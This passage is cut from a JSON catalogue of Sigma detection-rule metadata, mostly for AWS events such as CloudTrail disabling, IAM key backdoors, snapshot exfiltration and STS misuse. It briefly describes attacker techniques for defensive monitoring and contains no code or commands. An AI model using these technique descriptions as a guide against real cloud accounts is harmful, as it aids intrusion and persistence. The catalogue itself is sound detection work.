"https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml" - ], - "tags": [ - "attack.t1033" - ], - "creation_date": "2022/01/01", - "filename": "rpc_firewall_sharphound_recon_sessions.yml", - "author": "Sagie Dulce, Dekel Paz", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "application", - "logsource.product": "rpc_firewall" - } - }, - { - "description": "Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts", - "uuid": "0d2c3d4c-4b48-4ac3-8f23-ea845746bb1a", - "value": "Ruby on Rails Framework Exceptions", - "meta": { - "refs": [ - "http://edgeguides.rubyonrails.org/security.html", - "http://guides.rubyonrails.org/action_controller_overview.html", - "https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception", - "https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/ruby/appframework_ruby_on_rails_exceptions.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2017/08/06", - "filename": "appframework_ruby_on_rails_exceptions.yml", - "author": "Thomas Patzke", - "level": "medium", - "falsepositive": [ - "Application bugs" - ], - "logsource.category": "application", - "logsource.product": "ruby_on_rails" - } - }, - { - "description": "Detects suspicious Spring framework exceptions that could indicate exploitation attempts", - "uuid": "ae48ab93-45f7-4051-9dfe-5d30a3f78e33", - "value": "Spring Framework Exceptions", - "meta": { - "refs": [ - "https://docs.spring.io/spring-security/site/docs/current/apidocs/overview-tree.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/spring/appframework_spring_exceptions.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2017/08/06", - "filename": "appframework_spring_exceptions.yml", - "author": "Thomas Patzke", - "level": "medium", - "falsepositive": [ - "Application bugs" - ], - "logsource.category": "application", - "logsource.product": "spring" - } - }, - { - "description": "Detects SQL error messages that indicate probing for an injection attack", - "uuid": "8a670c6d-7189-4b1c-8017-a417ca84a086", - "value": "Suspicious SQL Error Messages", - "meta": { - "refs": [ - "http://www.sqlinjection.net/errors", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/sql/app_sqlinjection_errors.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2017/11/27", - "filename": "app_sqlinjection_errors.yml", - "author": "Bjoern Kimminich", - "level": "high", - "falsepositive": [ - "Application bugs" - ], - "logsource.category": "application", - "logsource.product": "sql" - } - }, - { - "description": "Detects when an user attached a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function's IAM role for AWS API calls.\nThis would give an adversary access to the privileges associated with the Lambda service role that is attached to that function.\n", - "uuid": "97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d", - "value": "AWS Attached Malicious Lambda Layer", - "meta": { - "refs": [ - "https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml" - ], - "tags": [ - "attack.privilege_escalation" - ], - "creation_date": "2021/09/23", - "filename": "aws_attached_malicious_lambda_layer.yml", - "author": "Austin Songer", - "level": "medium", - "falsepositive": [ - "Lambda Layer being attached may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Lambda Layer being attached from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "aws" - } - }, - { - "description": "Detects disabling, deleting and updating of a Trail", - "uuid": "4db60cc0-36fb-42b7-9b58-a5b53019fb74", - "value": "AWS CloudTrail Important Change", - "meta": { - "refs": [ - "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/best-practices-security.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_cloudtrail_disable_logging.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2020/01/21", - "filename": "aws_cloudtrail_disable_logging.yml", - "author": "vitaliy0x1", - "level": "medium", - "falsepositive": [ - "Valid change in a Trail" - ], - "logsource.category": "No established category", - "logsource.product": "aws" - } - }, - { - "description": "Detects AWS Config Service disabling", - "uuid": "07330162-dba1-4746-8121-a9647d49d297", - "value": "AWS Config Disabling Channel/Recorder", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_config_disable_recording.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2020/01/21", - "filename": "aws_config_disable_recording.yml", - "author": "vitaliy0x1", - "level": "high", - "falsepositive": [ - "Valid change in AWS Config Service" - ], - "logsource.category": "No established category", - "logsource.product": "aws" - } - }, - { - "description": "Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region.\nDisabling default encryption does not change the encryption status of your existing volumes.\n", - "uuid": "16124c2d-e40b-4fcc-8f2c-5ab7870a2223", - "value": "AWS EC2 Disable EBS Encryption", - "meta": { - "refs": [ - "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_disable_encryption.yml" - ], - "tags": [ - "attack.impact", - "attack.t1486", - "attack.t1565" - ], - "creation_date": "2021/06/29", - "filename": "aws_ec2_disable_encryption.yml", - "author": "Sittikorn S", - "level": "medium", - "falsepositive": [ - "System Administrator Activities", - "DEV, UAT, SAT environment. You should apply this rule with PROD account only." - ], - "logsource.category": "No established category", - "logsource.product": "aws" - } - }, - { - "description": "Detects bulk downloading of User Data associated with AWS EC2 instances. Instance User Data may include installation scripts and hard-coded secrets for deployment.", - "uuid": "26ff4080-194e-47e7-9889-ef7602efed0c", - "value": "AWS EC2 Download Userdata", - "meta": { - "refs": [ - "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__download_userdata/main.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_download_userdata.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1020" - ], - "creation_date": "2020/02/11", - "filename": "aws_ec2_download_userdata.yml", - "author": "faloker", - "level": "medium", - "falsepositive": [ - "Assets management software like device42" - ], - "logsource.category": "No established category", - "logsource.product": "aws" - } - }, - { - "description": "Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up.", - "uuid": "1ab3c5ed-5baf-417b-bb6b-78ca33f6c3df", - "value": "AWS EC2 Startup Shell Script Change", - "meta": { - "refs": [ - "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__startup_shell_script/main.py#L9", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_startup_script_change.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.004" - ], - "creation_date": "2020/02/12", - "filename": "aws_ec2_startup_script_change.yml", - "author": "faloker", - "level": "high", - "falsepositive": [ - "Valid changes to the startup script" - ], - "logsource.category": "No established category", - "logsource.product": "aws" - } - }, - { - "description": "An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance.", - "uuid": "54b9a76a-3c71-4673-b4b3-2edb4566ea7b", - "value": "AWS EC2 VM Export Failure", - "meta": { - "refs": [ - "https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_vm_export_failure.yml" - ], - "tags": [ - "attack.collection", - "attack.t1005", - "attack.exfiltration", - "attack.t1537" - ], - "creation_date": "2020/04/16", - "filename": "aws_ec2_vm_export_failure.yml", - "author": "Diogo Braz", - "level": "low", - "falsepositive": "No established falsepositives", - "logsource.category": "No established category", - "logsource.product": "aws" - } - }, - { - "description": "Detects when an Elastic Container Service (ECS) Task Definition has been modified and run.\nThis can indicate an adversary adding a backdoor to establish persistence or escalate privileges.\nThis rule is based on examining events created upon execution of Rhino Security Lab's Pacu in a lab environment.\n", - "uuid": "b94bf91e-c2bf-4047-9c43-c6810f43baad", - "value": "AWS ECS Backdoor Task Definition", - "meta": { - "refs": [ - "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py", - "https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html", - "https://attack.mitre.org/techniques/T1525", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ecs_task_definition_backdoor.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1525" - ], - "creation_date": "2022/06/07", - "filename": "aws_ecs_task_definition_backdoor.yml", - "author": "Darin Smith", - "level": "medium", - "falsepositive": [ - "Task Definition being modified to request credentials from the Task Metadata Service for valid reasons" - ], - "logsource.category": "No established category", - "logsource.product": "aws" - } - }, - { - "description": "Detects when a EFS Fileshare is modified or deleted.\nYou can't delete a file system that is in use.\nIf the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare.\n", - "uuid": "25cb1ba1-8a19-4a23-a198-d252664c8cef", - "value": "AWS EFS Fileshare Modified or Deleted", - "meta": { - "refs": [ - "https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/15", - "filename": "aws_efs_fileshare_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "aws" - } - }, - { - "description": "Detects when a EFS Fileshare Mount is modified or deleted. An adversary breaking any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts.", - "uuid": "6a7ba45c-63d8-473e-9736-2eaabff79964", - "value": "AWS EFS Fileshare Mount Modified or Deleted", - "meta": { - "refs": [ - "https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.t1485" - ], - "creation_date": "2021/08/15", - "filename": "aws_efs_fileshare_mount_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "aws" - } - }, - { - "description": "Identifies when an EKS cluster is created or deleted.", - "uuid": "33d50d03-20ec-4b74-a74e-1e65a38af1c0", - "value": "AWS EKS Cluster Created or Deleted", - "meta": { - "refs": [ - "https://any-api.com/amazonaws_com/eks/docs/API_Description", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.t1485" - ], - "creation_date": "2021/08/16", - "filename": "aws_eks_cluster_created_or_deleted.yml", - "author": "Austin Songer", - "level": "low", - "falsepositive": [ - "EKS Cluster being created or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "EKS Cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "aws" - } - }, - { - "description": "Detects when an ElastiCache security group has been created.", - "uuid": "4ae68615-866f-4304-b24b-ba048dfa5ca7", - "value": "AWS ElastiCache Security Group Created", - "meta": { - "refs": [ - "https://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_elasticache_security_group_created.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1136", - "attack.t1136.003" - ], - "creation_date": "2021/07/24", - "filename": "aws_elasticache_security_group_created.yml", - "author": "Austin Songer @austinsonger", - "level": "low", - "falsepositive": [ - "A ElastiCache security group may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group creations from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "aws" - } - }, - { - "description": "Identifies when an ElastiCache security group has been modified or deleted.", - "uuid": "7c797da2-9cf2-4523-ba64-33b06339f0cc", - "value": "AWS ElastiCache Security Group Modified or Deleted", - "meta": { - "refs": [ - "https://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_elasticache_security_group_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.t1531" - ], - "creation_date": "2021/07/24", - "filename": "aws_elasticache_security_group_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "low", - "falsepositive": [ - "A ElastiCache security group deletion may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security Group deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "aws" - } - }, - { - "description": "Detects enumeration of accounts configuration via api call to list different instances and services within a short period of time.", - "uuid": "e9c14b23-47e2-4a8b-8a63-d36618e33d70", - "value": "Account Enumeration on AWS", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_enum_listing.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1592" - ], - "creation_date": "2020/11/21", - "filename": "aws_enum_listing.yml", - "author": "toffeebr33k", - "level": "low", - "falsepositive": [ - "AWS Config or other configuration scanning activities" - ], - "logsource.category": "No established category", - "logsource.product": "aws" - } - }, - { - "description": "Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.", - "uuid": "6e61ee20-ce00-4f8d-8aee-bedd8216f7e3", - "value": "AWS GuardDuty Important Change", - "meta": { - "refs": [ - "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/guardduty__whitelist_ip/main.py#L9", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_guardduty_disruption.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2020/02/11", - "filename": "aws_guardduty_disruption.yml", - "author": "faloker", - "level": "high", - "falsepositive": [ - "Valid change in the GuardDuty (e.g. to ignore internal scanners)" - ], - "logsource.category": "No established category", - "logsource.product": "aws" - } - }, - { - "description": "Detects AWS API key creation for a user by another user.\nBackdoored users can be used to obtain persistence in the AWS environment.\nAlso with this alert, you can detect a flow of AWS keys in your org.\n", - "uuid": "0a5177f4-6ca9-44c2-aacf-d3f3d8b6e4d2", - "value": "AWS IAM Backdoor Users Keys", - "meta": { - "refs": [ - "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__backdoor_users_keys/main.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_iam_backdoor_users_keys.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ], - "creation_date": "2020/02/12", - "filename": "aws_iam_backdoor_users_keys.yml", - "author": "faloker", - "level": "medium", - "falsepositive": [ - "Adding user keys to their own accounts (the filter cannot cover all possible variants of user naming)", - "AWS API keys legitimate exchange workflows" - ], - "logsource.category": "No established category", - "logsource.product": "aws" - } - }, - { - "description": "Detects when an user creates or invokes a lambda function.", - "uuid": "d914951b-52c8-485f-875e-86abab710c0b", - "value": "AWS Lambda Function Created or Invoked", - "meta": { - "refs": [ - "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_lambda_function_created_or_invoked.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1078" - ], - "creation_date": "2021/10/03", - "filename": "aws_lambda_function_created_or_invoked.yml", - "author": "Austin Songer @austinsonger", - "level": "low", - "falsepositive": [ - "Lambda Function created or invoked may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "aws" - } - }, - { - "description": "Detects evade to Macie detection.", - "uuid": "91f6a16c-ef71-437a-99ac-0b070e3ad221", - "value": "AWS Macie Evasion", - "meta": { - "refs": [ - "https://docs.aws.amazon.com/cli/latest/reference/macie/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_macic_evasion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/07/06", - "filename": "aws_macic_evasion.yml", - "author": "Sittikorn S", - "level": "medium", - "falsepositive": [ - "System or Network administrator behaviors" - ], - "logsource.category": "No established category", - "logsource.product": "aws" - } - }, - { - "description": "Detects possible suspicious glue development endpoint activity.", - "uuid": "4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26", - "value": "AWS Glue Development Endpoint Activity", - "meta": { - "refs": [ - "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/", - "https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_passed_role_to_glue_development_endpoint.yml" - ], - "tags": [ - "attack.privilege_escalation" - ], - "creation_date": "2021/10/03", - "filename": "aws_passed_role_to_glue_development_endpoint.yml", - "author": "Austin Songer @austinsonger", - "level": "low", - "falsepositive": [ - "Glue Development Endpoint Activity may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "aws" - } - }, - { - "description": "Detects the change of database master password. It may be a part of data exfiltration.", - "uuid": "8a63cdd4-6207-414a-85bc-7e032bd3c1a2", - "value": "AWS RDS Master Password Change", - "meta": { - "refs": [ - "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_rds_change_master_password.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1020" - ], - "creation_date": "2020/02/12", - "filename": "aws_rds_change_master_password.yml", - "author": "faloker", - "level": "medium", - "falsepositive": [ - "Benign changes to a db instance" - ], - "logsource.category": "No established category", - "logsource.product": "aws" - } - }, - { - "description": "Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration.", - "uuid": "c3f265c7-ff03-4056-8ab2-d486227b4599", - "value": "Restore Public AWS RDS Instance", - "meta": { - "refs": [ - "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_rds_public_db_restore.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1020" - ], - "creation_date": "2020/02/12", - "filename": "aws_rds_public_db_restore.yml", - "author": "faloker", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "aws" - } - }, - { - "description": "Detects AWS root account usage", - "uuid": "8ad1600d-e9dc-4251-b0ee-a65268f29add", - "value": "AWS Root Credentials", - "meta": { - "refs": [ - "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_root_account_usage.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1078.004" - ], - "creation_date": "2020/01/21", - "filename": "aws_root_account_usage.yml", - "author": "vitaliy0x1", - "level": "medium", - "falsepositive": [ - "AWS Tasks That Require AWS Account Root User Credentials https://docs.aws.amazon.com/general/latest/gr/aws_tasks-that-require-root.html" - ], - "logsource.category": "No established category", - "logsource.product": "aws" - } - }, - { - "description": "Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar.", - "uuid": "3940b5f1-3f46-44aa-b746-ebe615b879e0", - "value": "AWS Route 53 Domain Transfer Lock Disabled", - "meta": { - "refs": [ - "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml", - "https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html", - "https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_route_53_domain_transferred_lock_disabled.yml" - ], - "tags": [ - "attack.persistence", - "attack.credential_access", - "attack.t1098" - ], - "creation_date": "2021/07/22", - "filename": "aws_route_53_domain_transferred_lock_disabled.yml", - "author": "Elastic, Austin Songer @austinsonger", - "level": "low", - "falsepositive": [ - "A domain transfer lock may be disabled by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Activity from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "aws" - } - }, - { - "description": "Detects when a request has been made to transfer a Route 53 domain to another AWS account.", - "uuid": "b056de1a-6e6e-4e40-a67e-97c9808cf41b", - "value": "AWS Route 53 Domain Transferred to Another Account", - "meta": { - "refs": [ - "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_route_53_domain_transferred_to_another_account.yml" - ], - "tags": [ - "attack.persistence", - "attack.credential_access", - "attack.t1098" - ], - "creation_date": "2021/07/22", - "filename": "aws_route_53_domain_transferred_to_another_account.yml", - "author": "Elastic, Austin Songer @austinsonger", - "level": "low", - "falsepositive": [ - "A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Domain transfers from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "aws" - } - }, - { - "description": "Detects when a user tampers with S3 data management in Amazon Web Services.", - "uuid": "78b3756a-7804-4ef7-8555-7b9024a02e2d", - "value": "AWS S3 Data Management Tampering", - "meta": { - "refs": [ - "https://github.com/elastic/detection-rules/pull/1145/files", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html", - "https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_s3_data_management_tampering.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1537" - ], - "creation_date": "2021/07/24", - "filename": "aws_s3_data_management_tampering.yml", - "author": "Austin Songer @austinsonger", - "level": "low", - "falsepositive": [ - "A S3 configuration change may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. S3 configuration change from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "aws" - } - }, - { - "description": "Detects the modification of the findings on SecurityHub.", - "uuid": "a607e1fe-74bf-4440-a3ec-b059b9103157", - "value": "AWS SecurityHub Findings Evasion", - "meta": { - "refs": [ - "https://docs.aws.amazon.com/cli/latest/reference/securityhub/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_securityhub_finding_evasion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562" - ], - "creation_date": "2021/06/28", - "filename": "aws_securityhub_finding_evasion.yml", - "author": "Sittikorn S", - "level": "high", - "falsepositive": [ - "System or Network administrator behaviors", - "DEV, UAT, SAT environment. You should apply this rule with PROD environment only." - ], - "logsource.category": "No established category", - "logsource.product": "aws" - } - }, - { - "description": "Detects the modification of an EC2 snapshot's permissions to enable access from another account", - "uuid": "abae8fec-57bd-4f87-aff6-6e3db989843d", - "value": "AWS Snapshot Backup Exfiltration", - "meta": { - "refs": [ - "https://www.justice.gov/file/1080281/download", - "https://attack.mitre.org/techniques/T1537/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_snapshot_backup_exfiltration.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1537" - ], - "creation_date": "2021/05/17", - "filename": "aws_snapshot_backup_exfiltration.yml", - "author": "Darin Smith", - "level": "medium", - "falsepositive": [ - "Valid change to a snapshot's permissions" - ], - "logsource.category": "No established category", - "logsource.product": "aws" - } - }, - { - "description": "Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges.", - "uuid": "905d389b-b853-46d0-9d3d-dea0d3a3cd49", - "value": "AWS STS AssumeRole Misuse", - "meta": { - "refs": [ - "https://github.com/elastic/detection-rules/pull/1214", - "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_sts_assumerole_misuse.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1548", - "attack.t1550", - "attack.t1550.001" - ], - "creation_date": "2021/07/24", - "filename": "aws_sts_assumerole_misuse.yml", - "author": "Austin Songer @austinsonger", - "level": "low", - "falsepositive": [ - "AssumeRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "AssumeRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.", - "Automated processes that uses Terraform may lead to false positives." - ], - "logsource.category": "No established category", - "logsource.product": "aws" - } - }, - { - "description": "Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.", - "uuid": "b45ab1d2-712f-4f01-a751-df3826969807", - "value": "AWS STS GetSessionToken Misuse", - "meta": { - "refs": [ - "https://github.com/elastic/detection-rules/pull/1213", - "https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_sts_getsessiontoken_misuse.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1548", - "attack.t1550", - "attack.t1550.001" - ], - "creation_date": "2021/07/24", - "filename": "aws_sts_getsessiontoken_misuse.yml", - "author": "Austin Songer @austinsonger", - "level": "low", - "falsepositive": [ - "GetSessionToken may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. GetSessionToken from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "aws" - } - }, - { - "description": "Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.", - "uuid": "f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e", - "value": "AWS Suspicious SAML Activity", - "meta": { - "refs": [ - "https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html", - "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_susp_saml_activity.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078", - "attack.lateral_movement", - "attack.t1548", - "attack.privilege_escalation", - "attack.t1550", - "attack.t1550.001" - ], - "creation_date": "2021/09/22", - "filename": "aws_susp_saml_activity.yml", - "author": "Austin Songer", - "level": "medium", - "falsepositive": [ - "Automated processes that uses Terraform may lead to false positives.", - "SAML Provider could be updated by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "SAML Provider being updated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "aws" - } - }, - { - "description": "An attacker with the iam:UpdateLoginProfile permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup.\nWith this alert, it is used to detect anyone is changing password on behalf of other users.\n", - "uuid": "055fb148-60f8-462d-ad16-26926ce050f1", - "value": "AWS User Login Profile Was Modified", - "meta": { - "refs": [ - "https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_update_login_profile.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ], - "creation_date": "2021/08/09", - "filename": "aws_update_login_profile.yml", - "author": "toffeebr33k", - "level": "high", - "falsepositive": [ - "Legit User Account Administration" - ], - "logsource.category": "No established category", - "logsource.product": "aws" - } - }, - { - "description": "This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service.\nA threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS 